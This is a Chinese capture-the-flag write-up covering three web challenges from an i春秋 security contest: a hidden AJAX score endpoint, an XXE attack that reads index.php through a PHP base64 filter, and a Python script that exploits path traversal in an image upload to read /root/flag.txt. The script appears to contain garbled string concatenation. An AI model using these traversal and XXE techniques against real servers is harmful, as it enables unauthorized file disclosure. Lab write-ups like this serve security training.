i春秋-网络与信息安全专项赛web部分wp

2019 年 8 月 28 日 黑白之道

Game




这道题是最简单的,进入页面后发现没啥头绪,就打看源码,发现了js文件里有猫腻




这里就是score=15的时候就会利用ajax去访问score.php。这个地方有可能是个突破点。那咱们来试一下就知道了。于是我就访问score.php并且构造了post请求。没想到就能直接得到flag一枚。



who_are_you?




看到这个输入框一下就想到sql注入,我们来试一下,发现没啥用,就换个思路发现输入啥显示啥,可不可能是xss,我们试一下,发现并不是。但是我们发现了是xml请求。




xml自然就联想到了xxe攻击了,那就构造poc吧。





这里是利用了php中的伪协议读的index.php,然后我们得到的内容base64解码就可以拿到flag了。


show_me_your_image




一个上传图片的页面。




上传成功后,这个的cookie 就会返回一个 base64 编码的文件路径。



然后用 img.php?name= 传这个文件路径过去,可以读取这个文件。



import requests

import urllib

from base64 import *

url='http://4d94492ab4fc4d0199f60b1f39d343e5805934980516472c.changame.ichunqiu.com/'

path='../..///root/flag.txt'

files={'file': (path '...png','a')}

r=requests.post(url 'upload.php',files=files)

try:

    name=r.text.split('img.php?name=')[1].split('"')[0]

except:

    name=r.text

name=urllib.unquote(name)[:-8]

#print name

r=requests.get(url 'img.php?name=' urllib.quote(name))

print r.text



本人也菜,还有一到web题没有做出来。

/*本片参考已出的wp做的,如有侵权,告知本人立马删*/

登录查看更多
1

相关内容

网络与信息安全:研究计算机网络与信息的安全问题。
【2020新书】实战R语言4,323页pdf
专知会员服务
100+阅读 · 2020年7月1日
还在修改博士论文?这份《博士论文写作技巧》为你指南
【干货书】流畅Python,766页pdf,中英文版
专知会员服务
224+阅读 · 2020年3月22日
《代码整洁之道》:5大基本要点
专知会员服务
49+阅读 · 2020年3月3日
【新书】Python编程基础,669页pdf
专知会员服务
194+阅读 · 2019年10月10日
msf实现linux shell反弹
黑白之道
49+阅读 · 2019年8月16日
渗透某德棋牌游戏
黑白之道
12+阅读 · 2019年5月17日
Pupy – 全平台远程控制工具
黑白之道
43+阅读 · 2019年4月26日
DiscuzX 3.4 Phar反序列化漏洞
黑客工具箱
8+阅读 · 2019年1月4日
实战 | 用Python做图像处理(三)
七月在线实验室
15+阅读 · 2018年5月29日
推荐一些适合小白练手的Python项目
数据挖掘入门与实战
6+阅读 · 2018年5月17日
[机器学习] 用KNN识别MNIST手写字符实战
机器学习和数学
4+阅读 · 2018年5月13日
Python 爬虫实践:《战狼2》豆瓣影评分析
数据库开发
5+阅读 · 2018年3月19日
教你用Python来玩跳一跳
七月在线实验室
6+阅读 · 2018年1月2日
tensorflow LSTM + CTC实现端到端OCR
机器学习研究会
26+阅读 · 2017年11月16日
Object Detection in 20 Years: A Survey
Arxiv
48+阅读 · 2019年5月13日
Few-shot Learning: A Survey
Arxiv
362+阅读 · 2019年4月10日
Arxiv
9+阅读 · 2018年10月24日
Bidirectional Attention for SQL Generation
Arxiv
4+阅读 · 2018年6月21日
VIP会员
相关VIP内容
【2020新书】实战R语言4,323页pdf
专知会员服务
100+阅读 · 2020年7月1日
还在修改博士论文?这份《博士论文写作技巧》为你指南
【干货书】流畅Python,766页pdf,中英文版
专知会员服务
224+阅读 · 2020年3月22日
《代码整洁之道》:5大基本要点
专知会员服务
49+阅读 · 2020年3月3日
【新书】Python编程基础,669页pdf
专知会员服务
194+阅读 · 2019年10月10日
相关资讯
msf实现linux shell反弹
黑白之道
49+阅读 · 2019年8月16日
渗透某德棋牌游戏
黑白之道
12+阅读 · 2019年5月17日
Pupy – 全平台远程控制工具
黑白之道
43+阅读 · 2019年4月26日
DiscuzX 3.4 Phar反序列化漏洞
黑客工具箱
8+阅读 · 2019年1月4日
实战 | 用Python做图像处理(三)
七月在线实验室
15+阅读 · 2018年5月29日
推荐一些适合小白练手的Python项目
数据挖掘入门与实战
6+阅读 · 2018年5月17日
[机器学习] 用KNN识别MNIST手写字符实战
机器学习和数学
4+阅读 · 2018年5月13日
Python 爬虫实践:《战狼2》豆瓣影评分析
数据库开发
5+阅读 · 2018年3月19日
教你用Python来玩跳一跳
七月在线实验室
6+阅读 · 2018年1月2日
tensorflow LSTM + CTC实现端到端OCR
机器学习研究会
26+阅读 · 2017年11月16日
相关论文
Object Detection in 20 Years: A Survey
Arxiv
48+阅读 · 2019年5月13日
Few-shot Learning: A Survey
Arxiv
362+阅读 · 2019年4月10日
Arxiv
9+阅读 · 2018年10月24日
Bidirectional Attention for SQL Generation
Arxiv
4+阅读 · 2018年6月21日
Top
微信扫码咨询专知VIP会员